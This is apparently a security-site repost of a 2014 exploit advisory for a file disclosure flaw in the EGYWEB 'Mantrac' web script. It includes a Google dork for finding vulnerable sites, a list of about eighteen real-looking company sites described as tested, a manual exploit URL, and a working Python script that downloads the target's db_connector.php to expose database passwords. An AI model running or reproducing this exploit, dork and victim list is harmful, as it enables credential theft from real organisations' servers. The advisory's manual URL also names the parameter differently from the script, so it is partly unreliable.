HackDig : Dig high-quality web security articles for hacker

EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)

2014-09-15 04:10

EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (onlymail) : knockout@e-mail.com.tr
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Special Thankz: 1337day.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software : www.egyweb.com
|~RISK : Medium
|~Google Keyword/Dork : "Created by EGYWEB" | "EGYWEB" inurl:index.php?pg= |
inurl:360download.php
|~Tested On : [L] Kali Linux Mozilla Firefox Arora [R) ALL example sites.
####################INFO################################
database passwords can be drawn.

### Error Line in '360download.php' ##

..
..
$file_name=$_REQUEST['file_name'];
download($file_name);

?>

########################################################

Example and tested on;

http://www.deXltagroup.com.eg
http://mantracXvostok.ru
http://www.maXntracghana.com
http://www.maXntracnigeria.com
http://www.maXntrackenya.com
http://www.maXntractanzania.com
http://www.unXatrac.com
http://www.iraXtrac.com
http://www.irXatrac.iq
http://www.uXnatrac.com
http://www.manXtracvostok.com
http://www.mantrXac-sl.com
http://www.mantrXacuganda.com
http://www.manXtracegypt.com
http://www.quesXt.com.eg
http://www.deltXa-ghana.com
http://www.deltXa-tanzania.com
http://www.pyraXmidscapital.com/eng/

############################################################
Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE]
############################################################
=========Automatic "db_connector.php" File Disclosure Exploit ========
##################### exploit.py in ##############################

import urllib


def master():
print """
########################################################

EGYWEB <= Remote File Disclosure Vulnerability (.py)
Automatic "db_connector.php" File Disclosure Exploit
Researched by KnocKout
Exploit Coded by B3mB4m
Website: http://h4x0resec.blogspot.com / h4x0re Security
============
How to use :
python exploit.py
Target : http://VICTIM.com
Target : http://VICTIM.com/path
That's it ! Happy END !

#################################################
"""

class KnocKout:
def __init__(self):
self.ask = raw_input("Target : ")
def exploit(self):
self.rename = self.ask.replace("http://", "") + ".php"
try:
urllib.urlretrieve(self.ask+"/360download.php?file_name=classes/db_connector.php", self.rename)
print "Finish ! Config --> %s " % (self.rename)
except:
print "This website have a security sorry ! ";

if __name__ == '__main__':
master()
op = KnocKout()
op.exploit()

References:

http://Cyber-Warrior.Org
http://h4x0resec.blogspot.com


Source: 8600904102-BLW/eussi/moc.ytirucesxc

Read:3507 | Comments:0 | Tags: exploit

“EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud